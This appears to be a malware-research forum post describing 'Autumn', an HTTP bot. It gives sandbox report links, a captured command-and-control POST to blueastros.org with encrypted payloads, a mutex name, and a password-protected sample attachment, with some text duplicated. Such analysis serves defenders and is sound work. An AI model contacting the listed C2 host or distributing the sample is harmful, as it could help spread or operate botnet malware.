Autumn, is an HTTP Bot similar to ngrBot but HTTP based.
And about ngrBot, Autumn is also capable to kill it.
Description of Autumn made by the coder:
Online Sandbox results:
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 0915407DF5
http://camas.comodo.com/cgi-bin/submit? ... 1e4417cd1a
http://www.threatexpert.com/report.aspx ... 41fceae0e5
Autum call home:
looking for order:
Create a mutex "ootoom":
Sample attached.
http://www.virustotal.com/file-scan/rep ... 1313159481
And about ngrBot, Autumn is also capable to kill it.
Description of Autumn made by the coder:
Online Sandbox results:
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 0915407DF5
http://camas.comodo.com/cgi-bin/submit? ... 1e4417cd1a
http://www.threatexpert.com/report.aspx ... 41fceae0e5
Autum call home:
Code: Select all
POST /c.php HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
Host: blueastros.org
Content-Length: 25
Cache-Control: no-cache
..$]......p.........HFk..HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 16:56:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Content-Length: 94
Connection: close
Content-Type: text/html; charset=UTF-8
.......wF^P....<....&s...[q....$g.....i.eh.s.w..c.LoM.)M)./R.II.*...!V`..2EX..s!2.bx2.0..H.N..
looking for order:
Create a mutex "ootoom":
Sample attached.
http://www.virustotal.com/file-scan/rep ... 1313159481
Attachments
pwd: infected
(12.54 KiB) Downloaded 60 times
(12.54 KiB) Downloaded 60 times